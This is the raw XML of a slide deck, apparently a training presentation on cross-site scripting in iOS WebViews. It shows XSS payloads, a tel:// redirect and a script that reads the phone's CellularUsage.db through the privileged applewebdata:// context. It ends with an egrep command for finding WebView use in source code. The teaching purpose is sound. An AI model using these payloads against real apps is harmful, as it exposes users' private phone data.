                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='tel://1123456789'&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Ouput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="16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6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284E029C-4CC3-4190-93CD-3668D7208A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3513132" y="2687590"/>
            <a:ext cx="2117736" cy="3685140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DBB506-97B1-47D7-86A7-BC076ADCD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465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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3EAB6B-388D-CC0C-3493-064AB0FD2300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432992542"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="418729" y="1396999"/>
          <a:ext cx="8194047" cy="4264065"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2307054">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4069633814"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3718560">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2506975677"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2168433">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2845320681"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="711460">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-FR" sz="1600" b="1" dirty="0"/>
                        <a:t>Question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984343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Can we also run arbitrary</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>JavaScript?</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44444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="880000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>onerror</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="880000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>alert(1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-FR"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Yes!</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827189"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>If so, under what context is</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>JavaScript executed?</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44444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;alert(location)&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="444444"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-FR"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t>Context</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                        <a:t>applewebdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>://</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Privileged Context</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Not protected with the Same Origin Policy, we can read local files!</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810822"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5AD5DBA-82CB-D2F5-93CB-792345B60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518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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3EAB6B-388D-CC0C-3493-064AB0FD2300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="545093664"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="418729" y="1396999"/>
          <a:ext cx="8194047" cy="2465745"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2307054">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4069633814"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3718560">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2506975677"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2168433">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2845320681"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="711460">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-FR" sz="1600" b="1" dirty="0"/>
                        <a:t>Question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FR" sz="1600" b="1" dirty="0"/>
                        <a:t>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984343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1754285">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>If XSS from a privileged context, can we read phone files and send them to the attacker?</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D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;a = new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>XMLHttpRequest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(); </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>a.open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>('GET', </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'file:///private/var/wireless/Library/Databases/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>CellularUsage.db</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>', false); a. send(); alert(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>a.responseText</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0D0B0D"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>);&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-FR" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0D0B0D"/>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Yes! We can read the phone history</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-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827189"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5AD5DBA-82CB-D2F5-93CB-792345B60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1244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fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Root Cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>? A possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>narrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> down </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to the locations of the source code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>WKWebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>UIWebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>accomplished</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> command :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>egrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WKWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UIWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>swift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
